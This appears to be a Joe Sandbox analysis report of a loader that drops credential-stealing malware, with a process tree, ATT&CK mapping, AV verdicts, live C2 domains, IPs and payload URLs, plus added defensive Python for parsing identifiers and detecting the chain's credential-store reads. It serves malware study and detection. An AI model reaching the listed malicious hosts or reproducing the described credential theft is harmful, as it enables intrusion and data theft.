Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea96478.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.31995570.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.30784e5e.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.31996478.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.30783f56.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.rpkhzpuO.pif.2e8737c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ead3d90.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70f08.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.304e0000.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.30784e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rpkhzpuO.pif.2761c6f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea95570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.335e0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.rpkhzpuO.pif.2e8737c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea95570.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.319d3d90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.31995570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.rpkhzpuO.pif.2b733e10.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d3f56.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea96478.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
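The "File source" identifiers in the Yara match lists above follow two naming schemes that describe the same memory: an unpacked-PE name such as 15.2.rpkhzpuO.pif.2da40000.4.raw.unpack (report process index 15, analysis stage 2, image carved at base 0x2DA40000, artefact index 4, ".raw" for the unrelocated copy) and a memory-dump name such as 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, which carries the same process index and stage in hex followed by the region base. Lining the two up tells a triager which dumps the carved PEs came from and which processes (4, 6, 15 and 19 here) actually hosted the matched code, without opening the report UI. The parser below is an added example, not part of the Joe Sandbox report or its tooling; the input is a constructed subset of the lines above. Reading the fifth .sdmp field as the Win32 page protection is an assumption (the values on this page, 0x2, 0x4 and 0x40, correspond to PAGE_READONLY, PAGE_READWRITE and PAGE_EXECUTE_READWRITE); the remaining trailing fields are left undecoded.

```python
"""Parse and correlate Joe Sandbox 'File source' identifiers from Yara-match lines.

Added example, not code from the report. Sample lines below are copied from the
match lists on this page; the PAGE_* decoding of the fifth .sdmp field is an
assumption, not documented by the report.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the "File source: X, type: T" values from this report.
SAMPLE_SOURCES = [
    "Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR",
    r"C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED",
    "15.2.rpkhzpuO.pif.2da40000.4.raw.unpack, type: UNPACKEDPE",
    "15.2.rpkhzpuO.pif.2da40000.4.unpack, type: UNPACKEDPE",
    "19.2.rpkhzpuO.pif.335e0000.11.unpack, type: UNPACKEDPE",
    "6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE",
    "0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY",
    "00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY",
    "00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY",
    "00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
]

# <pid>.<stage>.<process name, may contain dots>.<base hex>.<index>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)(\.raw)?\.unpack$")
# <pid hex>.<stage hex>.<dump id>.<base hex>.<4 undocumented hex fields>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$"
)
# Assumption: the fifth .sdmp field is the region's Win32 page protection.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_source(line):
    """Return a dict describing one 'File source: X, type: T' value."""
    name, _, kind = line.rpartition(", type: ")
    if kind == "UNPACKEDPE":
        m = UNPACK_RE.match(name)
        if not m:
            raise ValueError(f"unrecognised unpack name: {name}")
        return {"kind": kind, "pid": int(m.group(1)), "stage": int(m.group(2)),
                "process": m.group(3), "base": int(m.group(4), 16),
                "index": int(m.group(5)), "raw": m.group(6) is not None}
    if kind == "MEMORY":
        m = SDMP_RE.match(name)
        if not m:
            raise ValueError(f"unrecognised dump name: {name}")
        prot = int(m.group(5), 16)
        return {"kind": kind, "pid": int(m.group(1), 16), "stage": int(m.group(2), 16),
                "dump_id": int(m.group(3)), "base": int(m.group(4), 16),
                "protect": PAGE_PROTECT.get(prot, hex(prot))}
    if kind == "MEMORYSTR":
        m = re.search(r"Process Memory Space: (.+) PID: (\d+)$", name)
        return {"kind": kind, "process": m.group(1), "windows_pid": int(m.group(2))}
    if kind == "DROPPED":
        return {"kind": kind, "path": name}
    raise ValueError(f"unknown source type: {line}")


def correlate(lines):
    """Pair each memory dump with the unpacked PE(s) carved from the same base
    address in the same process/stage, and list which (process, stage) pairs matched."""
    parsed = [parse_source(line) for line in lines]
    unpacked = defaultdict(list)          # (pid, stage, base) -> unpack records
    for p in parsed:
        if p["kind"] == "UNPACKEDPE":
            unpacked[(p["pid"], p["stage"], p["base"])].append(p)
    paired, unpaired = [], []
    for p in parsed:
        if p["kind"] != "MEMORY":
            continue
        key = (p["pid"], p["stage"], p["base"])
        (paired if key in unpacked else unpaired).append((p, unpacked.get(key, [])))
    by_process = defaultdict(set)         # (pid, stage) -> artefact kinds with a match
    for p in parsed:
        if "pid" in p:
            by_process[(p["pid"], p["stage"])].add(p["kind"])
    return {"paired": paired, "unpaired": [d for d, _ in unpaired], "by_process": dict(by_process)}


if __name__ == "__main__":
    result = correlate(SAMPLE_SOURCES)
    for dump, pes in result["paired"]:
        print(f"pid {dump['pid']} stage {dump['stage']} base {dump['base']:#x} "
              f"({dump['protect']}) -> {len(pes)} carved PE(s) from {pes[0]['process']}")
    for dump in result["unpaired"]:
        print(f"pid {dump['pid']} stage {dump['stage']} base {dump['base']:#x}: dump only")
```

The two unpaired dumps in the sample are expected: the PID 6 dump starts at 0x802000 while the carved image base is 0x800000, and the PID 4 stage-3 dump has no carved PE in this subset. Matching on exact base is deliberate; widening it to "dump inside image" would need region sizes the identifiers do not carry.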
MITRE ATT&CK matrix, listed per tactic. A number in square brackets before a technique is the report's match-count badge, reproduced as extracted (where several badges sat side by side they have run together, e.g. [311]); techniques without a badge are the matrix template and were not matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: [1] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: [12] Native API; [1] Shared Modules; [2] Command and Scripting Interpreter; [1] Scheduled Task/Job; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: [1] DLL Side-Loading; [1] Valid Accounts; [1] Scheduled Task/Job; [21] Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: [1] DLL Side-Loading; [1] Valid Accounts; [1] Access Token Manipulation; [311] Process Injection; [1] Scheduled Task/Job; [21] Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: [11] Disable or Modify Tools; [11] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [3] Software Packing; [1] Timestomp; [1] DLL Side-Loading; [11] Masquerading; [1] Valid Accounts; [1] Access Token Manipulation; [41] Virtualization/Sandbox Evasion; [311] Process Injection
Credential Access: [1] OS Credential Dumping; [1] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: [1] System Time Discovery; [1] System Network Connections Discovery; [2] File and Directory Discovery; [36] System Information Discovery; [341] Security Software Discovery; [41] Virtualization/Sandbox Evasion; [2] Process Discovery; [1] Application Window Discovery; [1] System Network Configuration Discovery; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: [11] Archive Collected Data; [1] Data from Local System; [1] Screen Capture; [1] Email Collection; [1] Input Capture; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: [1] Ingress Tool Transfer; [11] Encrypted Channel; [2] Non-Application Layer Protocol; [113] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
Behavior Graph ID: 1583547 | Sample: PO_B2W984.com | Start date: 03/01/2025 | Architecture: WINDOWS | Score: 100

Graph-level DNS/IP nodes: reallyfreegeoip.org; lwaziacademy.com; 2 other IPs or domains
Signature on reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
Graph-level signatures: Submitted file has a suspicious file extension; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

Process tree (the numbers in parentheses after a process are the graph's registry-value / created-file count badges, as extracted):

PO_B2W984.com (1 10)
  DNS/IP: lwaziacademy.com 41.185.8.252, 443, 49746, 49747, GridhostZA, South Africa
  Dropped: C:\Users\Public\Libraries\rpkhzpuO.pif (PE32); C:\Users\Public\Libraries\Oupzhkpr.PIF (PE32); C:\Users\Public\Oupzhkpr.url (MS); 2 other malicious files
  Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  +-- rpkhzpuO.pif (6)
  |     Dropped: C:\Users\user\AppData\...\Trading_AIBot.exe (PE32); C:\Users\user\AppData\...\Microsofts.exe (PE32)
  |     Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
  |     +-- Trading_AIBot.exe (5)
  |     |     Dropped: C:\Users\user\AppData\Roaming\...\apihost.exe (PE32)
  |     |     Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
  |     |     +-- apihost.exe
  |     |     |     Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
  |     |     +-- powershell.exe (23)
  |     |     |     Signatures: Loading BitLocker PowerShell Module
  |     |     |     +-- conhost.exe
  |     |     |     +-- WmiPrvSE.exe
  |     |     +-- schtasks.exe
  |     |           +-- conhost.exe
  |     +-- Microsofts.exe (15 2)
  |           DNS/IP: checkip.dyndns.com 132.226.8.169, 49748, 80, UTMEMUS, United States; reallyfreegeoip.org 104.21.67.152, 443, 49749, CLOUDFLARENETUS, United States
  |           Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
  +-- cmd.exe (1)
        +-- conhost.exe
Oupzhkpr.PIF
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Sample uses process hollowing technique
  +-- cmd.exe
  |     +-- conhost.exe
  +-- rpkhzpuO.pif
Oupzhkpr.PIF
  Signatures: Sample is not signed and drops a device driver; Allocates many large memory junks
  +-- cmd.exe
  |     +-- conhost.exe
  +-- rpkhzpuO.pif
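The behaviour graph, the credential-store accesses listed earlier (Edge and Chrome "Login Data", the Outlook profile key) and the checkip.dyndns.com / reallyfreegeoip.org lookups describe a chain that is detectable from ordinary endpoint telemetry: a .pif executed from C:\Users\Public, a .pif dropping PE files into the user's Temp directory, one of those drops spawning both powershell.exe and schtasks.exe, a Temp-resident binary reading browser credential stores and the Outlook profile key, an external-IP lookup from that same binary, and the report's own network IOCs. The detection logic below is an added example, not part of the Joe Sandbox report. The event schema (Sysmon-style process_create / file_create / file_open / registry_open / dns_query / network_connect records, with field names of my choosing), the Desktop location of the sample and the event stream itself are constructed to mirror the report's process tree, not real telemetry.

```python
"""Detect the DBatLoader -> stealer chain from this report over a constructed event stream.

Added example, not code from the report. Event schema and field names are an
assumption modelled on Sysmon events; IOCs are taken from the report's tables.
"""
import re
from collections import defaultdict

# IOCs from the report's process tree and domain/URL tables.
C2_DOMAINS = {"lwaziacademy.com"}
C2_IPS = {"41.185.8.252"}
IP_CHECK_DOMAINS = {"checkip.dyndns.com", "checkip.dyndns.org", "reallyfreegeoip.org"}
BROWSER_CRED_STORE = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Login Data$", re.I)
OUTLOOK_PROFILE_KEY = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", re.I)
BROWSERS = {"chrome.exe", "msedge.exe"}      # legitimate readers of Login Data
MAIL_CLIENTS = {"outlook.exe"}               # legitimate readers of the profile key
TEMP_DIR = "\\appdata\\local\\temp\\"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) tuples for the behaviours the report observed."""
    findings = []
    children = defaultdict(set)   # parent pid -> child image basenames seen so far
    flagged_parents = set()
    pif_procs = set()             # pids whose image has a .pif extension
    for e in events:
        kind = e["event"]
        if kind == "process_create":
            img, ppid = e["image"], e["ppid"]
            children[ppid].add(basename(img))
            if img.lower().endswith(".pif"):
                pif_procs.add(e["pid"])
                if img.lower().startswith("c:\\users\\public\\"):
                    findings.append(("PIF_FROM_PUBLIC", e["pid"], img))
            if {"powershell.exe", "schtasks.exe"} <= children[ppid] and ppid not in flagged_parents:
                flagged_parents.add(ppid)
                findings.append(("PS_AND_SCHTASKS_FROM_SAME_PARENT", ppid, e["parent_image"]))
        elif kind == "file_create":
            if e["pid"] in pif_procs and e["is_pe"] and TEMP_DIR in e["path"].lower():
                findings.append(("PIF_DROPS_PE_IN_TEMP", e["pid"], e["path"]))
        elif kind == "file_open":
            if BROWSER_CRED_STORE.search(e["path"]) and basename(e["image"]) not in BROWSERS:
                findings.append(("NON_BROWSER_READS_LOGIN_DATA", e["pid"], e["path"]))
        elif kind == "registry_open":
            if OUTLOOK_PROFILE_KEY.search(e["key"]) and basename(e["image"]) not in MAIL_CLIENTS:
                findings.append(("NON_MAIL_CLIENT_READS_OUTLOOK_PROFILE", e["pid"], e["key"]))
        elif kind == "dns_query":
            q = e["query"].lower()
            if q in C2_DOMAINS:
                findings.append(("KNOWN_C2_DOMAIN", e["pid"], q))
            if q in IP_CHECK_DOMAINS and TEMP_DIR in e["image"].lower():
                findings.append(("TEMP_BINARY_IP_GEOLOOKUP", e["pid"], q))
        elif kind == "network_connect":
            if e["dst_ip"] in C2_IPS:
                findings.append(("KNOWN_C2_IP", e["pid"], e["dst_ip"]))
    return findings


def sample_events():
    """Constructed event stream mirroring the report's process tree (not real telemetry)."""
    pub = "C:\\Users\\Public\\Libraries\\"
    tmp = "C:\\Users\\user\\AppData\\Local\\Temp\\"
    sample = "C:\\Users\\user\\Desktop\\PO_B2W984.com"   # assumed location of the submitted file
    login_data = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
    return [
        {"event": "process_create", "pid": 10, "ppid": 1, "image": sample, "parent_image": "explorer.exe"},
        {"event": "dns_query", "pid": 10, "image": sample, "query": "lwaziacademy.com"},
        {"event": "network_connect", "pid": 10, "dst_ip": "41.185.8.252", "dst_port": 443},
        {"event": "file_create", "pid": 10, "path": pub + "rpkhzpuO.pif", "is_pe": True},
        {"event": "process_create", "pid": 19, "ppid": 10, "image": pub + "rpkhzpuO.pif", "parent_image": sample},
        {"event": "file_create", "pid": 19, "path": tmp + "Trading_AIBot.exe", "is_pe": True},
        {"event": "file_create", "pid": 19, "path": tmp + "Microsofts.exe", "is_pe": True},
        {"event": "process_create", "pid": 33, "ppid": 19, "image": tmp + "Trading_AIBot.exe", "parent_image": pub + "rpkhzpuO.pif"},
        {"event": "process_create", "pid": 49, "ppid": 33, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": tmp + "Trading_AIBot.exe"},
        {"event": "process_create", "pid": 51, "ppid": 33, "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": tmp + "Trading_AIBot.exe"},
        {"event": "process_create", "pid": 37, "ppid": 19, "image": tmp + "Microsofts.exe", "parent_image": pub + "rpkhzpuO.pif"},
        {"event": "file_open", "pid": 37, "image": tmp + "Microsofts.exe", "path": login_data},
        {"event": "registry_open", "pid": 37, "image": tmp + "Microsofts.exe",
         "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"},
        {"event": "dns_query", "pid": 37, "image": tmp + "Microsofts.exe", "query": "checkip.dyndns.com"},
        # Benign control: the browser reading its own credential store must not fire.
        {"event": "file_open", "pid": 100, "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "path": login_data},
    ]


if __name__ == "__main__":
    for rule, pid, detail in detect(sample_events()):
        print(f"{rule:40} pid={pid:<4} {detail}")
```

The behavioural rules (Public-folder .pif, Temp drops, powershell plus schtasks from one parent, credential-store reads by a non-browser) survive a rebuild of the loader with new file names and a new C2 host; the domain and IP entries only catch this specific campaign and should be treated as short-lived.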

Screenshots: this section contains all screenshots as thumbnails, including those not shown in the slideshow (images not reproduced here; remaining alt text: windows-stand).
Antivirus detection, submitted sample:
Source | Detection | Scanner | Label | Link
PO_B2W984.com | 27% | ReversingLabs | Win32.Trojan.Generic |
PO_B2W984.com | 36% | Virustotal | | Browse
PO_B2W984.com | 100% | Joe Sandbox ML | |

Antivirus detection, dropped files:
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Avira | TR/ATRAPS.Gen |
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Libraries\Oupzhkpr.PIF | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | 91% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger |
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 79% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker |
C:\Users\Public\Libraries\Oupzhkpr.PIF | 27% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\Public\Libraries\rpkhzpuO.pif | 3% | ReversingLabs | |
                          No Antivirus matches
                          No Antivirus matches
Antivirus detection, URLs (the trailing characters on several URLs are part of the string as found in memory):
Source | Detection | Scanner | Label
https://wdcp.mit | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png4 | 0% | Avira URL Cloud | safe
http://www.microsoft.co | 0% | Avira URL Cloud | safe
http://reallyfreegeoip.orgd | 0% | Avira URL Cloud | safe
https://lwaziacademy.com/wps/200_Oupzhkprnvw | 0% | Avira URL Cloud | safe
https://lwaziacademy.com/ | 0% | Avira URL Cloud | safe
http://checkip.dyndns.orgd | 0% | Avira URL Cloud | safe
http://checkip.dyndns.comd | 0% | Avira URL Cloud | safe
https://lwaziacademy.com/wps/200 | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe
http://www.pmail.com0 | 0% | Avira URL Cloud | safe
https://lwaziacademy.com/wps/200_OupzhkprnvwE | 0% | Avira URL Cloud | safe
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.67.152 | true | false | | high
lwaziacademy.com | 41.185.8.252 | true | true | | unknown
checkip.dyndns.com | 132.226.8.169 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/102.129.153.238 | false | | high
https://lwaziacademy.com/wps/200_Oupzhkprnvw | true | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | | high
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):

Name: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp
Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown

Name: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: https://sectigo.com/CPS0
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false | Reputation: high

Name: https://wdcp.mit
Source: rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown

Name: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 